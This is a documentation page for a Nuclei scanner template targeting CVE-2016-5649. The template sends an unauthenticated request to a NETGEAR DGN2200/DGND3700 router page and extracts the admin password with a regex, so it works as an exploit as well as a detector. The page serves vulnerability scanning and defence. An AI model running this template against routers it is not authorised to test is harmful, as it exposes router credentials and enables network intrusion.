Skip to content
Nuclei Templates

NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure

ID: CVE-2016-5649

Severity: critical

Author: suman_kar

Tags: cve2016,cve,iot,netgear,router,packetstorm

Description

Section titled “Description”

NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page ‘BSW_cxttongr.htm’ which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router’s web interface.

YAML Source

Section titled “YAML Source”
id: CVE-2016-5649


info:
  name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
  author: suman_kar
  severity: critical
  description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
  impact: |
    An attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
  remediation: |
    Update the router firmware to the latest version, which includes a fix for the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2016-5649
    - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html
    - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-5649
    cwe-id: CWE-319,CWE-200
    epss-score: 0.17436
    epss-percentile: 0.95662
    cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: dgn2200_firmware
  tags: cve2016,cve,iot,netgear,router,packetstorm


http:
  - raw:
      - |
        GET /BSW_cxttongr.htm HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Smart Wizard Result</title> "


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: password
        group: 1
        regex:
          - '<b>Success "([a-z]+)"'
        part: body
# digest: 4b0a00483046022100ef55eb4d11d5cb4190a848719d35d1c0b2d2081e0ac5c5fdb857e53fa5644fb50221008336f6392f421ac88077b5f5115bb33a43395e1436106b6d0b774f40d6dd30a8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-5649.yaml"

View on Github